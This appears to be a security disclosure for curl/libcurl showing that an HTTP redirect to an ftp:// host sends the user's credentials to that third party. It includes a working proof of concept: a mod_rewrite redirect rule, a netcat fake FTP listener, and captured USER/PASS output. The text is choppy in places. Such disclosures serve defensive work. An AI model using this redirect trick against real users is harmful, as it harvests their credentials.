curl/libcurl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect to ftp:// URL.
firstsite.tld
to perform redirect with mod_rewrite:
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L]
```
secondsite.tld
for example with:while true; do echo -e "220 pocftp\n331 plz\n530 bye" | nc -v -l -p 9999; done
curl -L --user foo https://firstsite.tld/redirectpoc
Listening on 0.0.0.0 9999
Connection received on somehost someport
USER foo
PASS secretpassword
There are several issues here:
firstsite.tld
vs secondsite.tld
). This is definitely not what the user could expect, considering the documentation says:In addition, TLS SRP user credentials (CURLOPT_TLSAUTH_USERNAME
and CURLOPT_TLSAUTH_PASSWORD
) are also leaked on redirects.
Leak of confidential information (user credentials).